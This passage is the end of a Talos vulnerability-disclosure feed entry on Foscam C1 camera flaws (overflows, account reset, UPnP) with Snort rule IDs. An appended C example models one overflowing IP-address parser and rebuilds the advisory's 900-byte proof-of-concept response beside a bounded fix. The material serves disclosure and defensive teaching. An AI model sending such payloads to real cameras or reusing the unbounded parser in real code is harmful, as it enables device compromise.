an information disclosure vulnerability. An unauthenticated remote attacker could leverage this vulnerability to obtain sensitive device information such as MAC address, camera name, and firmware version. TALOS-2017-0381 has been assigned CVE-2017-2874. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0381/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0002 Username Field Code Execution Vulnerability (TALOS-2017-0382 / CVE-2017-2875)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to a buffer overflow condition that can be leveraged by an unauthenticated remote attacker to obtain remote code execution on affected devices. This vulnerability is due to a lack of proper bounds checking on the contents of the username parameter that is submitted during authentication requests. TALOS-2017-0382 has been assigned CVE-2017-2875. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0382/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0002 Password Field Code Execution Vulnerability (TALOS-2017-0383 / CVE-2017-2876)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to a buffer overflow condition that can be leveraged by an unauthenticated remote attacker to obtain remote code execution on affected devices. This vulnerability is due to a lack of proper bounds checking on the contents of the password parameter that is submitted during authentication requests. TALOS-2017-0383 has been assigned CVE-2017-2876. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0383/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10001 Command 0x0064 Empty AuthResetKey Vulnerability (TALOS-2017-0384 / CVE-2017-2877)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to a condition in which an unauthenticated attacker could reset user accounts configured on the devices to factory defaults by sending a specially crafted network packet over UDP/10001 to affected devices. Due to a lack of error checking, it is possible to reset these user accounts without ever having to specify a valid 'authResetKey' value within the request to reset the accounts. TALOS-2017-0384 has been assigned CVE-2017-2877. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0384/\">here</a>.<br /><h3>Foscam IP Video Camera CGIProxy.fcgi logOut Code Execution Vulnerability (TALOS-2017-0385 / CVE-2017-2878)</h3><br />Foscam C1 HD Indoor cameras are vulnerable to a buffer overflow condition that is reachable via the 'logOut' command present within the web management interface. This vulnerability could be leveraged by an attacker to obtain remote code execution on affected devices. Exploitation of this vulnerability would require an attacker to authenticate to the device, even with a limited \"Visitor\" account. TALOS-2017-0385 has been assigned CVE-2017-2878. 
For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0385/\">here</a>.<br /><h3>Foscam IP Video Camera UPnP Discovery Code Execution Vulnerability (TALOS-2017-0386 / CVE-2017-2879)</h3><br />Foscam C1 HD Indoor cameras utilize a UPnP implementation that is designed to enable the devices to communicate with the network gateway to facilitate remote access for the web management interface of the device. The UPnP implementation used by the Foscam C1 is vulnerable to a buffer overflow condition that could be leveraged by an attacker to obtain remote code execution on affected devices. By sending a specially crafted UPnP Discovery response to affected devices, a remote attacker could trigger this vulnerability. TALOS-2017-0386 has been assigned CVE-2017-2879. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0386/\">here</a>.<br /><br /><h2 id=\"h.tgg1wyliengd\">Versions Tested</h2><br />Talos has tested and confirmed that the following Foscam firmware versions are affected:<br /><br />Foscam Indoor IP Camera C1 Series<br />System Firmware Version: 1.9.3.18<br />Application Firmware Version: 2.52.2.43<br />Plug-In Version: 3.3.0.26<br /><br /><h2 id=\"h.sf4d4surofjk\">Conclusion</h2><br />One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, available <a href=\"https://foscam.com/downloads/index.html\">here</a> to resolve these issues. 
Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable. <br /><br /><h2 id=\"h.halfffbm6urf\">Coverage</h2><br />The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.<br /><br /><b>Snort Rules:</b> 42432 - 42434, 43080 - 43082, 43555 - 43558, 43713, 43717.", "modified": "2017-11-13T15:43:57", "published": "2017-11-13T07:43:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YKAUrwmrtDE/foscam-multiple-vulns.html", "id": "TALOSBLOG:7BE1D1E5EBE1795D650713F7725AE383", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Foscam C1 Indoor HD Cameras", "cvss": {"score": 0.0, "vector": "NONE"}}]}
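Worked example (added here; not Foscam firmware or Talos code). The loop at [18]-[21] in the advisory above copies every byte after `Current IP Address:` until it meets `<`, with no bound on the destination. By the advisory's own numbers the destination is the field at offset 0x58 of the 140-byte structure at 0xa8074, so only 52 bytes fit before the write runs into whatever follows in `.bss`; the loop also never checks for NUL, so a response with no `<` after the marker makes it read past the 0x400-byte response buffer as well. The C below models that parser against a flat `.bss` stand-in, rebuilds the Talos proof-of-concept body, and puts a bounded parser beside it. The field layout around the IP buffer, the 2048-byte `.bss` model, the sample HTTP response and the address `203.0.113.7` are assumptions constructed for the example; the real oray.com response format is not on the page.

```c
/*
 * Added example, not Foscam firmware or Talos code: a C model of the
 * oray.com checkip response parser described in TALOS-2017-0357, beside a
 * bounded replacement. Sizes come from the advisory (140-byte global
 * structure, IP buffer at offset 0x58, 0x400-byte response read); the
 * exact field layout around the IP buffer is an assumption.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define GLOBAL_SIZE  140                      /* structure at 0xa8074 */
#define IP_OFF       0x58                     /* IP buffer offset inside it */
#define IP_BUF_SIZE  (GLOBAL_SIZE - IP_OFF)   /* 52 bytes actually available */
#define RESP_MAX     0x400                    /* CDdnsClient__readyToRead limit [17] */
#define BSS_MODEL    2048                     /* assumed: room for what follows the struct in .bss */

static const char MARKER[] = "Current IP Address:";   /* 19 bytes, hence LDRB [R0,#0x13] */

/* Mirrors [18]-[21]: "200 OK" anywhere, then copy every byte after the
 * marker until '<'. No destination bound, and no stop on NUL either, so a
 * response without '<' also reads past the end of the response buffer. */
static int parse_checkip_vulnerable(const char *resp, char *dst)
{
    if (strstr(resp, "200 OK") == NULL) return -1;
    const char *p = strstr(resp, MARKER);
    if (p == NULL) return -1;
    p += sizeof MARKER - 1;
    while (*p != '<') *dst++ = *p++;
    *dst = '\0';
    return 0;
}

typedef enum { IP_OK = 0, IP_NO_200, IP_NO_MARKER, IP_TOO_LONG, IP_UNTERMINATED, IP_BAD_FORMAT } ip_status;

/* strstr that respects the buffer length instead of trusting a NUL. */
static const char *find_bounded(const char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return hay + i;
    return NULL;
}

/* Strict dotted-quad check: four decimal octets 0..255, nothing else. */
static bool looks_like_ipv4(const char *s)
{
    int octets = 0;
    while (*s != '\0') {
        if (*s < '0' || *s > '9') return false;
        int v = 0, digits = 0;
        while (*s >= '0' && *s <= '9') {
            v = v * 10 + (*s - '0');
            if (++digits > 3) return false;
            s++;
        }
        if (v > 255) return false;
        octets++;
        if (*s == '.') {
            if (octets == 4) return false;
            s++;
            if (*s == '\0') return false;
        } else if (*s != '\0') {
            return false;
        }
    }
    return octets == 4;
}

/* Bounded replacement: anchors on the status line rather than "200 OK"
 * anywhere, never reads past resp_len, never writes past dst_len, and only
 * accepts something shaped like an IPv4 address. Fails closed with dst empty. */
ip_status parse_checkip_bounded(const char *resp, size_t resp_len, char *dst, size_t dst_len)
{
    if (dst_len == 0) return IP_TOO_LONG;
    dst[0] = '\0';
    if (resp_len < 13 || memcmp(resp, "HTTP/1.", 7) != 0 || memcmp(resp + 8, " 200 ", 5) != 0)
        return IP_NO_200;
    const char *p = find_bounded(resp, resp_len, MARKER);
    if (p == NULL) return IP_NO_MARKER;
    p += sizeof MARKER - 1;
    const char *end = resp + resp_len;
    size_t n = 0;
    while (p < end && *p != '<') {
        if (n + 1 >= dst_len) { dst[0] = '\0'; return IP_TOO_LONG; }
        dst[n++] = *p++;
    }
    if (p == end) { dst[0] = '\0'; return IP_UNTERMINATED; }
    dst[n] = '\0';
    if (!looks_like_ipv4(dst)) { dst[0] = '\0'; return IP_BAD_FORMAT; }
    return IP_OK;
}

/* Builds the advisory's proof-of-concept body into buf:
 * "200 OK Current IP Address:" + pad * 'A' + "<". Returns its length, 0 if buf is too small. */
size_t build_poc_response(char *buf, size_t buf_len, size_t pad)
{
    static const char head[] = "200 OK Current IP Address:";
    size_t hl = sizeof head - 1;
    if (buf_len < hl + pad + 2) return 0;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', pad);
    buf[hl + pad] = '<';
    buf[hl + pad + 1] = '\0';
    return hl + pad + 1;
}

/* Runs the vulnerable parser with the IP buffer at offset 0x58 of a flat
 * model of .bss and reports how many bytes landed beyond the 140-byte
 * structure. The overflow stays inside the model, so the result is defined. */
size_t vulnerable_overflow_bytes(const char *resp)
{
    unsigned char bss[BSS_MODEL] = {0};
    if (parse_checkip_vulnerable(resp, (char *)bss + IP_OFF) != 0) return 0;
    size_t last = 0;
    for (size_t i = GLOBAL_SIZE; i < BSS_MODEL; i++)
        if (bss[i] != 0) last = i + 1;
    return last ? last - GLOBAL_SIZE : 0;
}

int main(void)
{
    char poc[RESP_MAX];
    char ip[IP_BUF_SIZE];
    build_poc_response(poc, sizeof poc, 900);
    printf("vulnerable parser: %zu bytes written past the structure\n",
           vulnerable_overflow_bytes(poc));
    printf("bounded parser on the PoC: status %d (no status line)\n",
           parse_checkip_bounded(poc, strlen(poc), ip, sizeof ip));
    return 0;
}
```

With the advisory's 900-byte payload the model shows 848 bytes landing past the end of the structure (900 minus the 52 bytes that fit). The bounded version rejects that payload before parsing because it anchors on the status line rather than on `200 OK` appearing anywhere in the first 1024 bytes, and it fails closed on an over-long or unterminated value. None of this helps against an attacker who already sits on the HTTP path: the camera still fetches its address over plaintext HTTP, so a parser fix closes the memory-corruption bug, not the interception.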